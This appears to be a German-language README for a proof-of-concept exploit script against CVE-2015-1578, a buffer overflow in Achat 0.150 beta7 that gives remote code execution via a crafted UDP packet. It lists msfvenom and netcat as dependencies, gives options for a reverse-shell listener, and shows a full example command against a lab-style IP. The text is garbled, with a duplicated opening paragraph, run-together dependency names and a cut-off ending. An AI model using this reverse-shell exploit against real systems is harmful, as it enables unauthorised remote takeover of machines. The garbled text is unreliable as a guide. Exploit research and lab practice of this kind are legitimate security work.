
Dies ist ein Proof-of-Concept-Exploit für CVE-2015-1578, eine Pufferüberlauf-Schwachstelle in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zu Remote-Codeausführung über ein manipuliertes UDP-Paket.
Dies ist ein Proof-of-Concept-Exploit für CVE-2015-1578, eine Pufferüberlauf-Schwachstelle in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt über ein manipuliertes UDP-Paket zur Remote-Codeausführung.
Dieser PoC soll als sauberes, minimales und gut strukturiertes Beispiel für die Entwicklung von Exploits dienen. Er demonstriert:
msfvenommsfvenom (Teil des Metasploit Framework)rlwrap (für eine verbesserte Netcat-Bedienbarkeit)msfvenomrlwrap nc-i <target_ip> Ziel-IP-Adresse (erforderlich)
-l, --lhost <listener_ip> Lokale Host-IP für die Reverse Shell (erforderlich)
-p, --lport <port> Lokaler Port für die Reverse Shell (erforderlich)
--rport <port> Remote-UDP-Port auf dem Ziel (Standard: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Dies wird: